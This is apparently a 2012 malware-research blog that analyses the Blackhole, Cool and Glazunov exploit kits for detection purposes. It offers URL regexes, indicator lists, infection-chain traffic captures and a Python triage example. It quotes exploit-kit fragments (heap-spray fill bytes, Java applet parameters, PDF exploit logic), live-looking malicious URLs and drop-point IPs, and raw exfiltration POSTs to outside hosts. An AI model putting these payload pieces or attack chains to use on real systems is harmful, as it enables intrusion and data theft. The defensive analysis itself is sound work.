Sunday, December 30, 2012

Parenthesis URL Pattern, Likely Associated with Badness

I ran into an interesting URL pattern containing parentheses in a specific method. On deeper inspection, it looks like this pattern may be associated with badness, the details of which I am not certain of, but I thought it good enough to bring to the community.


My research on this so far indicates that some of the URLs are associated with known Zeus/SpyEye C2 servers, and that a large number of these patterns are hosted on legitimate sites whose subdirectories containing these patterns are not indexed by Google. Also, it appears this pattern has been active for some time and may have been identified by other researchers; I am not sure.

Some URLquery patterns show redirects to a domain that was reported in December, associated with drive-by downloads, in an Android forum which is no longer operational (at least today).

The observations at this time are that these are redirects, or contain redirects, to badness, which is why I am bringing it to the community.







The URL pattern in question is:

\(s\(\w{24}\)\)?\/\w{2,}\.aspx

There is one URLquery report on this type of URL here. On inspection, this report shows a series of GET requests, including one URL which traces back to a report on undroid.us as containing badness (hxxp://zirycatum.com/k985ytv.htm). I also noticed k985ytv.htm more than once.




And I'm not alone in looking at this, going back a while now.

AVG did recognize the content.


Jsunpack 





www.undroid.us/wordpress/?cat=19
Dec 8, 2012 - 2. zirycatum.com (ex: hxxp://zirycatum.com/k985ytv.htm) 3. numudozaf.com (ex: hxxp://numudozaf.com/k985ytv.htm) Above all resolve to the same Moldova (south ...



Any feedback or further info, hit me up @fknsec

I have not researched if any IDS (Snort) sigs match this pattern.

HAPPY NEW YEAR





References:
http://urlquery.net/report.php?id=14666
www.undroid.us/wordpress/?cat=19
http://jsunpack.jeek.org/?report=fc505de91ae02e6ed905bb22746975e5d4d70c93
http://forums.cnet.com/7726-6132_102-3375245.html

Sunday, December 16, 2012

Unrecognized URL Pattern Involving Malware Binaries

In the interests of keeping FPs to a minimum, I'm including the mooo.com, but pull it out if you want to test your site for FPs. This appears to be designed to deliver malware binaries and at this point I do not have anything further to share. I would keep an eye out for this one; please feed back any info to @fknsec #teamwork.


Pattern type 1
mooo\.com\/\w{2,8}\d{3}\_\d{4}\.php\?\w{4,10}\=

Pattern type 2 (appears to be only binaries)

mooo.com\/\?\w{2,9}\=[a-zA-Z0-9]{16,}


Pattern type 1 examples (date observed, URL):

2012-12-14  hxxp://www2.e77lzbgasyhun.mooo.com/udhnj106_5613.php?8tpb=XN/p2KKso9zwx9vOme7R2attqqGVi6eg0LeVj...
2012-12-14  hxxp://www2.e77lzbgasyhun.mooo.com/zkzd106_5613.php?qamk2=lczm4W/ao6fi39bUh+jizLKjp5KgkaLOm3Sfo...
2012-12-14  hxxp://www2.tf6qzs0witws-0.mooo.com/dxohf241_5874.php?zh2cgpfl=nt6gy92ty9rZ16mX79yUtJ6srqdToOPM...
2012-12-14  hxxp://www2.f32w14gqqvnfax.mooo.com/owxryn107_5613.php?l4uv0n=kKfX723h3aek4ppa3NrVs6OckquSpN7ab...
2012-12-14  hxxp://www2.id0hx24nz8.mooo.com/twp211_5613.php?wzapem=m+XV6aLa29ak0epYqdfedaywkqOL3dLIbZuek5bQ...
2012-12-14  hxxp://www2.q04leu6wmk.mooo.com/nnxybd231_5619.php?qzgoh7=leXP26Wa0p6h14vqn9uqoKeroJXYoNVtZ5LG1...
2012-12-14  hxxp://www2.r4qjwq40c4.mooo.com/uxm211_5613.php?te47u=mN6WobLaluLO6dWfVtid2KJpbaalWuHT265nVsSW1...
2012-12-14  hxxp://www2.i9cofxif5uz6i7.mooo.com/vigpkh241_5688.php?9dyzjo2pw=Xdfn3eTnb+jg4KPd3ozt0spyqrBuoV...
2012-12-14  hxxp://www2.r4qjwq40c4.mooo.com/taedi107_5613.php?11zq1=Vabf5ZWvq97N3eWtVtidlW6vp2KlWuHT265nVsS...
2012-12-14  hxxp://www2.poqjik8iv0.mooo.com/yhxvgz106_5613.php?09rrso=VJ/o1djjrdLq193bno/rmZR2p6ikopbf2s6mn...
2012-12-14  hxxp://www2.e77lzbgasyhun.mooo.com/bdj106_5613.php?cmlw7lm=h9jl7XTh2dWtnODniNzK17adq5+Wk9zgm6mg...
2012-12-14  hxxp://www2.i9cofxif5uz6i7.mooo.com/fdje106_5613.php?pae5=lNjIodF2zuXL3NeMqt7ec55toZSLpdKdoKKM2...    /mxatxt241_5813.php?954u91o4yx=XZmV63af1Zvm4tPlj9uZ13KkbWemV6...
2012-12-14  hxxp://www2.poqjik8iv0.mooo.com/dano107_5613.php?0bqhdq36=VNDX3Myul63e2+eQ3tScpqtmYZWX2M3VcGmW0...
2012-12-14  hxxp://www2.poqjik8iv0.mooo.com/vqepgx107_5613.php?g9fm=i6fM4dis1eHX166P65nLdpujoaKX2tLPdZyckcm...
2012-12-14  hxxp://www2.e77lzbgasyhun.mooo.com/ppjdu106_5613.php?mteo6tgk=kd/e5XPp09vbnKvZoNfQxbCunqahk+TO0...



Pattern Type 2: Binary (as per Exploit Shield)

2012-12-13 17:13 http://www2.v-iy381t22z638.mooo.com/?0aimsen=VMTW0bDK5ttT3uKXdWara.... 78d5758eebe3df79ffd40efef16af944 7/45
2012-12-13 17:12 http://www2.v-iy381t22z638.mooo.com/?slwo4wee=l8%2Fk03Hc3cqcotLdcG.... 597f409a3f786a960b8683b4bb9ebdc7 12/46
2012-12-13 17:08 http://www2.v-iy381t22z638.mooo.com/?ugmrldkb=mcra1qnJ48ecotLdcG1o.... 1526a20a234749ae4cd61fa1e95e8559 12/46
2012-12-13 17:05 http://www2.v-iy381t22z638.mooo.com/?tkln=mM7Z0rOS4d5ZrZrYb2exbWle.... 70bc0edd237458587de240b8ef71a0d5 scanning...
2012-12-13 17:04 http://www2.v-iy381t22z638.mooo.com/?xl0r=nM%2Bd1rOS4d5ZrZrYb2exbW.... 337ac36ee8544e342200a85e38c88ce6 12/46
2012-12-14 13:52 http://www2.fmrmta0nhmql95.mooo.com/?4audhacuw1=WMTiyKXG29qdps%2FR.... 7261465fae1c1d0a9c776658c91da6a8 11/46
2012-12-14 13:51 http://www2.fmrmta0nhmql95.mooo.com/?hyvxj=jNzj3KfL5deT6cqUq52joaJ.... 6806bfa3b01fda85105dc265bfb625e2 11/46
2012-12-14 13:49 http://www2.fmrmta0nhmql95.mooo.com/?191lqzd=VZye0K7f3MuT59bYnmWkm.... 837b7e8a971805b33b2822677dd446a9 scanning...
2012-12-14 08:01 http://www2.g8gbbckylo8.mooo.com/?smbvs0=l9DP2rCV352N18vHqK6kp22Z4.... 49448bafc166568b3b8af8f7fc285ca5 9/45
2012-12-14 08:00 http://www2.g8gbbckylo8.mooo.com/?hgsx1=jMrg3G7MsMyI18zPtqGncJ2N5%.... e426696ef1f1b8c2814c7330cdd9a916 9/45
2012-12-14 01:33 http://www2.ie8qrahzp1jfg4.mooo.com/?uhsr2ea=mcvg1m%2FK2c6LrdrWnp2.... 42bd8297b01e1c1a50cf16a74ed8595a 16/45


Friday, December 7, 2012

Case Study: Exploiting Weakness To Quietly Exfiltrate Data

As per Emergingthreats, this is the Glazunov exploit kit.

This particular case is an excellent example to demonstrate that malware authors do their best to avoid detection and do not play by the internet rules. Defense in depth is a critical component of any information security program and would help limit the damage from an attack of this nature.

This example shows:
  • A compromised site/malicious site which is, for the better part, unrecognized.
  • A redirect to HTTP TCP port 8080 direct to IP
  • Content delivery which appears innocuous in URL logs.
  • Java exploits which are not detected by virtually any AV
  • Malware which is not detected
  • Exfiltration of data on high ports showing as only TCP connections
  • Utilizing other people's IP addresses as drop points

This was achieved because of the following gaps in security:


  • Endpoint did not have updated Java version and was vulnerable
  • Web filtering did not block direct to IP requests
  • Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.
  • AV did not detect the malware
  • Outbound ports were not restricted. The endpoint could communicate outbound.




The entry point is a 301 redirect; however, the content length is a28, and there is what AVG recognizes as a Blackhole redirect in the 301 response.
hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/
This is a dangerous website and should not be visited in a browser.



The next step is for me to get the redirect URL.

GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive

And gives me a gift... to quote my friend Tarun.
HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];



The redirect is to rigo6680.zapto.org/?go=2, which is consistent with TDS redirects.

http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b

Additional redirects appear everywhere on the page, see the CSS redirect below.

Redirect from a CSS file.
http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725

What happens next?


The following URL chain occurs. Included in here is a YouTube video (the 74.125.x.y IP addresses).


609  31.956187  10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1
613  32.126215  10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1
616  32.196442 65.163.12.222 -> 10.1.2.3  HTTP 1152 HTTP/1.1 200 OK  (PNG)
625  32.545505 74.125.236.9 -> 10.1.2.3  HTTP 674 HTTP/1.1 200 OK  (application/x-shockwave-flash)
637  33.374071  10.1.2.3 -> 64.34.183.111 HTTP 335 GET /2354796716/12230 HTTP/1.1
673  33.543459  10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1
688  33.587050 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
695  33.626438  10.1.2.3 -> 64.34.183.111 HTTP 292 GET /2354796716/12230 HTTP/1.1
744  33.867125 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
770  34.193535  10.1.2.3 -> 64.34.183.111 HTTP 245 GET /15692 HTTP/1.1
931  34.501338 64.34.183.111 -> 10.1.2.3  HTTP/DL 958 unknown (0x4d)

Here's the Java.




And we run the Java, which contains CVE-2012-1723, and the binary materializes and is executed immediately.


Posting Data to Drop Points


What we get are connections on TCP port 35516 posting  data to compromised Windows servers online. What is interesting about this is that it is not recognized as HTTP. It is only protocol TCP and on outbound port 35516. This would fly under the radar of many detection mechanisms.

This infection is a wonderful case study in an infection chain using difficult to detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.

Four IP addresses were drop points:
131.96.243.22
74.59.207.114
68.197.117.117
87.203.78.137

The infection point is 64.34.183.111:8080

Here is what the Posting looks like.








VT for Jar file. CVE 2012-1723 - 2/46
https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/

ed-309-aaenak.gsu.edu

Raw POST information


POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ

HTTP/1.1 200 OK
Content-Length: 4
Connection: close

[

------------------------------------------------------------------


POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóC坣tZ‡£¬4Ø–‘

videotron.ca (1)
Host: modemcable114.207-59-74.mc.videotron.ca
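The posting traffic above is the part of this chain that most tools would miss: it is HTTP, but on TCP port 35516, with a form-urlencoded body that carries raw bytes instead of URL-encoded text. The following is an added example (not code from this post) of how a defender could triage such a capture. The sample request is constructed to mirror the captured POST (same path, headers and field shape); the bytes in its data field only approximate the real payload, and the benign request is made up for contrast. The destination port is passed in separately because the request itself does not carry it.

```python
"""Flag raw POSTs that look like the drop-point traffic in this case study.

Added example, not code from the post. The sample request is constructed to
mirror the captured POST; the binary bytes are an approximation, not the real
payload.
"""
import re

STANDARD_HTTP_PORTS = {80, 443, 8080}
# The captured body shape: a file name followed by raw (not URL-encoded) bytes.
DROP_BODY_RE = re.compile(rb"^filename=([^&]+)&data=(.*)$", re.DOTALL)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into method, path, lowercase headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii", "replace")] = value.strip().decode("ascii", "replace")
    return {"method": method.decode("ascii", "replace"),
            "path": path.decode("ascii", "replace"),
            "headers": headers, "body": body}


def nonprintable_ratio(data):
    """Fraction of bytes outside printable ASCII; URL-encoded form data should be near 0."""
    if not data:
        return 0.0
    return sum(1 for b in data if b < 0x20 or b > 0x7E) / len(data)


def classify_drop_post(raw, dst_port):
    """Return the exfil indicators a POST exhibits, plus the posted file name if any."""
    req = parse_http_request(raw)
    indicators = []
    filename = None
    if dst_port not in STANDARD_HTTP_PORTS:
        # HTTP on 35516 shows up as plain TCP in many tools, exactly as the post describes.
        indicators.append("nonstandard_port")
    ctype = req["headers"].get("content-type", "")
    m = DROP_BODY_RE.match(req["body"])
    if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded") and m:
        filename = m.group(1).decode("ascii", "replace")
        indicators.append("filename_data_form")
        if nonprintable_ratio(m.group(2)) > 0.3:
            # Raw bytes where URL-encoded text is expected: the client never encoded the payload.
            indicators.append("binary_form_data")
    return {"filename": filename, "indicators": indicators, "path": req["path"]}


# Constructed sample modelled on the first captured POST (payload bytes approximated).
_DROP_BODY = b"filename=bphgt.ntz&data=" + bytes.fromhex(
    "9c54acbbf14ff55b21356139b17238c6e053debc8341f48850f6ead9")
SAMPLE_DROP_POST = b"\r\n".join([
    b"POST /nymain/nm1932719/index.php HTTP/1.1",
    b"Host: 131.96.243.22",
    b"Content-Length: %d" % len(_DROP_BODY),
    b"Accept-Encoding: deflate",
    b"Content-Type: application/x-www-form-urlencoded",
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)",
    b"Pragma: no-cache",
    b"Cache-Control: no-cache",
    b"Connection: close",
]) + b"\r\n\r\n" + _DROP_BODY

# Constructed benign form POST on a normal port, for contrast.
BENIGN_POST = (b"POST /login HTTP/1.1\r\nHost: intranet.example\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\n\r\n"
               b"user=alice&pass=secret")

if __name__ == "__main__":
    print(classify_drop_post(SAMPLE_DROP_POST, 35516))
    print(classify_drop_post(BENIGN_POST, 80))
```

The port check is the indicator that would have fired here even without payload inspection, which is the post's point about restricting outbound ports; the body checks are what lets you tell a form submission from a file upload once you do have the bytes.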



@fknsec

All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.

Saturday, November 24, 2012

Blackhole 2.0.1 Exploit - URL Pattern

Blackhole Exploit Kit 2.0.1 - URL Pattern

Written by Frank Angiolelli, CISSP


Blackhole 2.0 has evolved into Blackhole 2.0.1, which incorporates CVE-2012-5076, and the URL structure has evolved. Currently, there are iframes built with adjustments to the URL that include what appear to be hard-coded values.

Example:
<iframe src="/obtaining/notify- publishes_ post-used. php?tvipazdb=1l:1f:33:1n:1j&bkb=j& zizcdg=30:1n:1h :30:1n:33:30:1m: 2v:32& edd=1f:1d:1f:1d:1f: 1d:1f"></iframe>


The PDF:


The PDF GET request that I have researched and observed recently consistently contains the following string:

"1n:1d:1f:1d:1f:1d:1j:1k:1l"

So patterned out, it looks like this:

\.php\?\w{2,8}\=((1|2|3)[a-z0-9]\:){4}(1|2|3)[a-z0-9]\&\w{2,8}\=[a-z0-9]{2}\&\w{2,8}\=((1|2|3)[a-z0-9]\:){9}(1|2|3)[a-z0-9]\&\w{2,8}\=1n\:1d\:1f\:1d\:1f\:1d\:1j\:1k\:1l

Additionally, it appears that the second parameter value is consistently a 2 character value, though no longer hexadecimal. Ostensibly, the structure pattern is the same with some minor variations to throw off detection.

It should be noted this may not catch every single variation, but currently I know there are enough matches to make this likely valuable.

Examples:
/links/excuse_lorrys-names-carries.php?iucvwm=2w:31:33:1o:1g&rxjw=3j&aqpmcap=2w:1k:30:31:1j:1h:33:1m:1f:33&zprptb=1n:1d:1f:1d:1f:1d:1j:1k:1l

/pleasing/forward-facts.php?dht=1g:2v:33:2v:2w&hxala=33&nbz=33:1l:1g:2v:30:1m:33:32:1l:1k&zrchhlmf=1n:1d:1f:1d:1f:1d:1j:1k:1l

hxxp://cosmic-calls.net/detects/mixing-evened-quits-spot.php?xpu=2w:31:33:1o:1g&ftzajz=3a&jlzjamgn=1k:2w:32:30:1n:1h:33:31:2v:2w&xlxsjzzi=1n:1d:1f:1d:1f:1d:1j:1k:1l

/less/pounds-value_mean.php?fhkguehd=31:2v:30:1i:1o&vcyvea=36&qpqvia=1n:30:30:31:2v:2w:1o:1f:1f:31&pjqnyncg=1n:1d:1f:1d:1f:1d:1j:1k:1l

The Java:


The Java request when used as the direct exploit is identical to the entry point URL in my investigations, however the content type is adjusted to application/x-java-archive. See the exploit chain towards the end of this article. I am unsure of what the structure looks like after a PDF is served.

The Binary:

Additionally, the URL structure is in a similar format to the 2.0 URL structure, in that the binary GET request's first parameter has 10 characters (though they are no longer hex) and the second parameter contains 20 characters (again, not hex). These values are now separated by colons.

And the binary GET request appears at this time to match the following pattern. Please feed back any false positives to me. This is slightly wide to allow for additional variants I may not be seeing. Suggestions for adjustments, optimization or false positives: please feed back to @fknsec.

\.php\?(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){4}(1|2|3)[a-z0-9]\&)(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){9}(1|2|3)[a-z0-9]\&)\w{1,8}\=\w{2}\&\w{2,8}\=\w{1,8}\&\w{2,8}\=\w

The primary difference observed at this point is that Blackhole 2.0.1 favors serving the Java CVE-2012-5076 exploit before the Adobe PDF is served, as seen with systems having Java 6u35 and Adobe 9.x. In my previous article on Blackhole 2.0, the kit exclusively served a PDF file first.

Binary Examples:
/less/pounds-value_mean.php?if=1i:1m:2w:1g:1o&pe=1n:30:30:31:2v:2w:1o:1f:1f:31&k=1f&rg=m&ht=b

hxxp://62.109.24.128/links/excuse_lorrys-names-carries.php?df=1o:1l:31:1o:1f&ne=2w:1k:30:31:1j:1h:33:1m:1f:33x=1ffb=gci=b

http://syenial.com/links/1.php?rf=1k:1g:1i:1i:1m&oe=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&p=1f&rq=x&vf=d

Blackhole 2.0.1 In Action:


GET /less/pounds-value_mean.php HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: u91s.info
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sat, 24 Nov 2012 19:33:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive


f86
<html><head><title></title></head><body><object classid="clsid:8AD9C840-044E-11D1
-B3E9-00805F499D93" codebase="http://java.sun.com/update/1.6.0/jinstall-6u60-wind
ows-i586.cab#Version=6,0,0,0" WIDTH="200" HEIGHT="200" ><PARAM NAME="CODE" VALUE=
"hw"><PARAM NAME="ARCHIVE" VALUE="/less/pounds-value_mean.php"><param name="type"
value="application/x-java-applet"><param name="val" value="0b0909041f"/><param n
ame="prime" value="3131213e37193c323a2c173143351919310417213a0019220e1a4321350c23
351a3a3c040b043d322c3937321f37231f270a1f37051f371702043539373a1f081c1f081c1f08371
f270e1f270a1f37171f372c1f372c1f0837021139372c0244053923020b093928"/></




Then:




GET /less/pounds-value_mean.php HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: u91s.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sat, 24 Nov 2012 19:33:58 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 10940
ETag: "c9a6c96d607f63a618e07759c2f7391e"
Last-Modified: Sat, 24 Nov 2012 19:32:36 GMT
Accept-Ranges: bytes


PKñ¨vAMETA-INF/þÊPKPKñ¨vAMETA-INF/MANIFEST.MFóMÌËLK-.ÑK-*ÎÌϳR0Ô3àår.JM,IMÑuª˜éÄ+
h—æ)øf&åW—¤æ+xæ%ëiòrù&fæé:ç$[)d”órñrPK­Añ WWPKu¥vAhw.class




Finally the Binary:



GET /less/pounds-value_mean.php?if=1i:1m:2w:1g:1o&pe=1n:30:30:31:2v:2w:1o:1f:1f:31&k=1f&rg=m&ht=b HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: u91s.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sat, 24 Nov 2012 19:33:59 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 131072
Pragma: public
Expires: Sat, 24 Nov 2012 19:32:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary


MZÿÿ¸@躴Í!¸LÍ!This program cannot be run in DOS mode.


References:
http://www.securitynotes.ro/2012/11/discovering-blackhole-part-i.html
http://integriography.wordpress.com/2012/11/19/dissecting-a-blackhole-2-pdf-mostly-with-peepdf/
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=baeccb2947004ded2dc9079e89e42b41
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrH3ELFCs_SJwhmmh6aLTFCPqS-rR_ln5dYJ57CUbUM5of7XPs3wLD-QlDVwEtq-68uGKj9fXDbyiCjW0aHR-OKY38txLQ6evHgM2dYbsce0cMmEN7Druq_OtZVgzm-YFpA9tMyzhmGixg/s1600/screenshot_1451.png
http://www.scumware.org/report/94.250.251.61

Saturday, November 17, 2012

Cool Exploit Kit - URL Structure

The write up from malware.dontneedcoffee.com on Cool Exploit Kit is excellent.

Here, I will concentrate on how it is operating with an emphasis on detection based on URL structure. Please note, variants are possible and these may change, but as of now, this is what I am seeing. More to come, check back again.



Cool Exploit Kit URL Structure

The static entries in the observed Cool Exploit Kit contain the following URLs.


/32size_font.eot
/64size_font.eot
/media/field.swf
/media/pdf_new.php
/media/pdf_old.php
/media/score.swf
/media/new.jar
/media/file.jar
/bagdfssdb.jar
/flash.swf?info=[a-f0-9]{32,}

Binary Regex: \/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$
(Credit Emergingthreats sid:2015873)

The current implementations of this exploit kit reside under single-letter subdirectories, e.g. "/r/media" or "/t/media", but it appears any single letter is possible.

Known Repeat Offenders:


46.21.148.217
184.170.142.13
85.143.166.112
193.0.179.5


PluginDetect 0.7.9


  <body onload='try{window.focus();}catch(e){}'>
var PluginDetect={
        version:"0.7.9",

It is using PluginDetect. It is doing the math and extracting the version numbers; I think we are all familiar with this (beating a dead horse).


JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,40],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){
        var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());
        a.hasRun=1;
        if(c){
          return a}
        var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l={
        };

Now, let's look deeper into what it is asking for based on your versions:

Flash


function getCN(){ return "../media/score.swf" }
function getBlockSize(){ return 1024 }
function getAllocSize(){ return 1024*1024 }
function getAllocCount(){ return 300 }
function getFillBytes(){ var a='%u'+'0c0c'; return a+a }
function getShellCode(){
oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='../media/field.swf' />
Then we have this possibility

<param name='movie' value='../media/flash.swf?info="+avmurl+"' /><embed src='../media/flash.swf?info="+avmurl+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>"}
Which leads to something like this:
hxxp://monstercompanionsbonuses.info/data/flash.swf?info=02e6b1525353caa8adb5b7b55154335730b4b55732b6b17e08e8888930f129f18f4889a8888f096949898e70487096a91637293629b67a4b726e7f


Ok great, we have score.swf, flash.swf?info= and field.swf. This is strangely familiar (rolling eyes).

Cool Exploit PDF Logic

In the PDF logic, if the version of Adobe detected is lower than 8, it sets a variable vver to "old"; if it is 8 or higher (in the code below, 8.x or 9.0 through 9.3), it sets vver to "new". The exploit is recognized as Adobe PDF Memory Corruption /Ff Dictionary Key Corruption.

if (pdf[0] < 8){
          vver = "old";
          setTimeout("FlashExploit()", 8003);
} else if (pdf[0] == 8 || (pdf[0] == 9 && pdf[1] < 4)){
          vver = "new";
          setTimeout("FlashExploit()", 7004);
}

d.innerHTML = '<iframe src="../media/pdf_' + vver + '.php"></iframe>';

So now what does it do with this information?

It builds a URL "../media/pdf_" + vver + ".php", so /media/pdf_new.php or /media/pdf_old.php.




Now, let's look at the Java:


          if (javax[1]==7){
            variant = "new";
            val1="0b0909041f";
            val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139270235391c022c391c";
          } else {
            variant = "file";
            val1="0b0909041f";
            val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139370235391c022c391c";
          }


WIDTH="200" HEIGHT="200"><PARAM NAME="CODE" VALUE="bagdfssdb"><PARAM NAME="CODEBASE" VALUE="../media/"><PARAM NAME="ARCHIVE" VALUE="' + variant + '.jar"><param name="type" value="application/x-java-applet;version=1.6"><param name="val" value="'+val1+'"/><param name="prime" value="'+val2+'"/></object>';

Notice the "CODEBASE" value "../media/". Great.
So presumably we should be looking for GET requests containing "/media/", since each of these files resides under media, with the potential exception of some of the jar files, whose names appear to be built from parameters inside the exploit kit.



I also ran into hxxp://now.kitchenssinks.co.uk/t/media/new.jar

I am still looking into the predictability of additional jar files.


Binary:
So far, the only binary GET request I have been able to observe is /f.php?k=. It should be noted that there are known variations with additional parameters, which are represented well by the Emergingthreats regex \/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$




Conclusion:

The Cool Exploit Kit can be detected in its current form. I hope to have more soon. As always, I welcome thoughts, comments and collaboration. @fknsec

References:


http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html
http://threatpost.com/en_us/blogs/new-java-attack-introduced-cool-exploit-kit-111212
http://www.malwaredomainlist.com/forums/index.php?action=recent
http://www.avgthreatlabs.com/webthreats/info/cool-exploit-kit/
http://jsunpack.jeek.org/?report=6aa9697f44b5f61ba3cb76b64935694c351f35ff
http://doc.emergingthreats.net/bin/view/Main/2015887


Thursday, November 1, 2012

Deeper into Blackhole, URLs and dialects.

Written by Frank Angiolelli, CISSP

I am still focused on Blackhole URLs, specifically the binary get request. As I look deeper into the URL, tightening up the regex seems possible, as well as broadening the detection to catch those that use longer hex values. There are distinct dialects in the binary get request that are emerging.


The improved Regex

Binary Get Request:
\.php\?\w{2,8}\=(0[0-9a-b]|3[0-9]){5,32}\&\w{2,9}\=(0[0-9a-b]|3[0-9]){10}\&\w{1,8}\=\d{2}\&\w{1,8}\=\w{1,8}\&\w{1,8}\=\w{1,8}

Optimized by suggestions from Will Metcalf @node5. Thanks Will.

PDF Get Request:
\.php\?\w{2,9}\=(0[0-9a-b]|3[0-9]){5}\&\w{3,9}\=(3[0-9a-f]|4[0-9a-f])\&\w{3,9}\=(0[0-9a-b]|3[0-9]){10}\&\w{3,9}\=(0[0-9a-b]{1,8})00020002

Thanks to @Dr4g0nFlySm0k3 for widening out my sample set and testing.


Dialects in the Binary Get Request:

While the exact meaning of the dialects is unknown to me at this time, there are three distinct dialects I have seen in the binary get requests in the wild up to this point. By dialects, I'm referring to a particular pattern variation which is similar among groups of binary get requests.

Dialect 1: The 2by10
In this dialect, the first parameter is 2 letters followed by 10 hex characters (2by10). The second parameter is 2 characters followed by 20 hex characters (2by20), then 1 character followed by two digits (1by2), 2by1 and 2by1. This seems to be the most common that I have seen in the wild and was the basis for my first regex to detect the binary.
/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m

Dialect 2: The 3by10
In this dialect, it goes 3by10, 3/4by20; the remainder varies, however the third parameter is consistently a two-digit number. I do not have enough of these to extrapolate a predictable pattern yet.

Dialect 3: The 4/5/6by64
In this dialect, the first parameter is 4, 5 or 6 letters followed by a 64-character hex value (4/5/6by64). The second parameter is 8 or 9 characters followed by a 20-character hex value (8/9by20). There is fluctuation in the remaining parameters, but the third parameter is always a two-digit number.
